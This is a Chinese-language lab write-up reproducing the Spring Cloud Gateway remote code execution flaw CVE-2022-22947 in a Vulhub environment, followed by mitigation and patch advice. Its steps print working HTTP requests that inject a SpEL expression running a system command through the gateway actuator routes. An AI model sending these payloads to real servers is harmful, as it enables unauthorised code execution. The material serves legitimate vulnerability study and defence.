Spring Cloud Gateway 遠程代碼執行漏洞復現CVE-2022-22947


漏洞說明

2022年3月1日,VMware官方發布漏洞報告,在使用Spring Colud Gateway的應用程序開啟、暴露Gateway Actuator端點時,會容易造成代碼注入攻擊,攻擊者可以制造惡意請求,在遠程主機進行任意遠程執行。

漏洞影響范圍

Spring Cloud Gateway 3.1.x < 3.1.1

Spring Cloud Gateway 3.0.x < 3.0.7

舊的、不受支持的版本也會受到影響

漏洞復現

本次復現采用Vulhub靶場環境,需要在本地搭建Vulhub靶場,需注意將請求中的代碼更換為靶機所在IP。

1.進入靶場環境:cd Vulhub/spring/CVE-2022-22947

 

 

 2.啟動服務:docker-compose up -d

 

 3.訪問靶場服務器IP+端口:http://192.168.1.76:8080

 

 4.構造包含惡意請求的路由,利用BP進行發送:

POST /actuator/gateway/routes/hacktest HTTP/1.1 Host: 192.168.1.76:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/json Content-Length: 329 { "id": "hacktest", "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}" } }], "uri": "http://example.com" }

 

 5.然后應用剛添加的路由發送如下數據包,此數據包會觸發表達式執行:

POST /actuator/gateway/refresh HTTP/1.1 Host: 192.168.1.76:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0

 

 6.發送如下數據包可查看結果:

GET /actuator/gateway/routes/hacktest HTTP/1.1 Host: 192.168.1.76:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0

 

 7.最后發送如下數據包進行清理,刪除所添加的路由:

DELETE /actuator/gateway/routes/hacktest HTTP/1.1 Host: 192.168.1.76:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close

 

 8.再次刷新路由:

POST /actuator/gateway/refresh HTTP/1.1 Host: 192.168.1.76:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0

 

 9.以上漏洞環境使用完成后,使用以下命令進行環境移除:docker-compose down

漏洞修復

臨時解決方案

    如果不需要Actuator端點,可以通過management.endpoint.gateway.enable:false配置將其禁用

    如果需要Actuator端點,則應使用Spring Security對其進行保護。

官方升級補丁

    3.1.x版本用戶及時升級到3.1.1+

    3.0.x版本用戶及時升級到3.0.7+


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM